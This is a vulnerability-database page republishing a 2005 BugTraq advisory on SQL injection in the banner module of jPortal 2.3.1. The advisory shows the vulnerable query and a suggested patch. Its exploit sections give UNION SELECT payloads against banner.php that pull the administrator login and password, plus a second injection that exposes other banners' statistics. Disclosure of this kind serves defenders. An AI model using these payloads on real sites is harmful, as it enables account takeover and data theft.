Lucene search

K

jportal231.txt

🗓️ 18 Apr 2005 00:00:00Reported by Marcin KrupowiczType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 20 Views

SQL injection vulnerability found in jPortal version 2.3.1 affecting the banner module.

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Hello BugTraq,  
  
I've found possibility to inject sql code in jPortal version 2.3.1, in  
module "banner" (module/banner.inc.php).  
  
Bug is in these lines of code:  
[code]  
$query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC";  
[/code] - line 192.  
  
There is unfiltered variable $haslo. In order to patch this code just do this:  
[code]  
$haslo = addslashes($haslo);  
$query = "SELECT * FROM $bann_a_tbl WHERE title='$haslo' ORDER BY id DESC";  
[/code]  
  
[exploit]  
go to http://[victim]/jportal/banner.php and try this:  
  
' UNION SELECT NULL, nick, NULL, NULL, NULL, NULL, NULL, NULL, NULL,  
NULL, NULL, NULL, NULL, NULL from admins where '1=1  
  
and then:  
  
' UNION SELECT NULL, pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL,  
NULL, NULL, NULL, NULL, NULL from admins where '1=1  
  
After that, You gain login and password of administrator.  
[/exploit]  
  
[exploit2]  
try to inject this code:  
' or id='x x - banner id  
After that, You can see statistics of not banners, to which you  
haven't got passwords.  
[/exploit2]  
  
Vendor (http://jportal2.com) has been informed already.  
  
--   
Best regards,  
Marcin "CiNU5" Krupowicz  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
18 Apr 2005 00:00Current
7.4High risk
Vulners AI Score7.4
20
.json
Report